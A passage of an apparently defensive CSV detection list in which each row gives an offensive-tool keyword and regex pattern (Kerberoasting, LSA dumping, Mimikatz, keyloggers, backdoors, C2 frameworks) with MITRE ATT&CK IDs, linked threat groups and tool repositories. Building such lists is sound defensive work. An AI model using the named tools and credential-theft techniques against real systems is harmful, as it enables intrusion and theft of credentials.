TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49127" "*Invoke-KeeThief*",".{0,1000}Invoke\-KeeThief.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49128" "*invoke-kerberoast *",".{0,1000}invoke\-kerberoast\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - 
TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49129" "*invokekerberoast*",".{0,1000}invokekerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49130" 
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","49131" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49132" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - 
FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49133" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - 
Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49134" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49135" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49136" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","49137" "*Invoke-Kerberoast.ps1*",".{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black 
Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49138" "*Invoke-Keylogger*",".{0,1000}Invoke\-Keylogger\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49139" "*Invoke-Kirby*",".{0,1000}Invoke\-Kirby.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49140" "*Invoke-KrbRelay*",".{0,1000}Invoke\-KrbRelay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49141" "*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49142" "*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49143" "*Invoke-LazySign.ps1*",".{0,1000}Invoke\-LazySign\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49144" "*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49147" "*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49148" "*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49149" "*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49150" "*Invoke-Lockless*",".{0,1000}Invoke\-Lockless.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49151" "*Invoke-Locksmith.ps1*",".{0,1000}Invoke\-Locksmith\.ps1.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","49152" 
"*Invoke-LockWorkStation*",".{0,1000}Invoke\-LockWorkStation.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49153" "*Invoke-LoginPrompt.ps1*",".{0,1000}Invoke\-LoginPrompt\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","49154" "*Invoke-LoopBackdoor*",".{0,1000}Invoke\-LoopBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49155" "*Invoke-LSADump *",".{0,1000}Invoke\-LSADump\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49156" "*Invoke-LSADump*",".{0,1000}Invoke\-LSADump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49157" "*Invoke-LsaProtectionCheck*",".{0,1000}Invoke\-LsaProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49158" "*Invoke-LsaProtectionsCheck*",".{0,1000}Invoke\-LsaProtectionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49159" "*Invoke-LSWMImplant*",".{0,1000}Invoke\-LSWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49160" "*Invoke-M.i.m.i.k.a.t.z*",".{0,1000}Invoke\-M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49161" "*Invoke-MachineRoleCheck*",".{0,1000}Invoke\-MachineRoleCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49162" "*Invoke-MailSearch*",".{0,1000}Invoke\-MailSearch.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49163" "*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49165" "*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - 
T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49166" "*Invoke-MapDomainTrust*",".{0,1000}Invoke\-MapDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49167" "*Invoke-MassCommand.ps1*",".{0,1000}Invoke\-MassCommand\.ps1.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49168" 
"*Invoke-MassMimikatz*",".{0,1000}Invoke\-MassMimikatz.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49169" "*Invoke-MassSearch.ps1*",".{0,1000}Invoke\-MassSearch\.ps1.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49170" "*Invoke-MassTokens.ps1*",".{0,1000}Invoke\-MassTokens\.ps1.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the 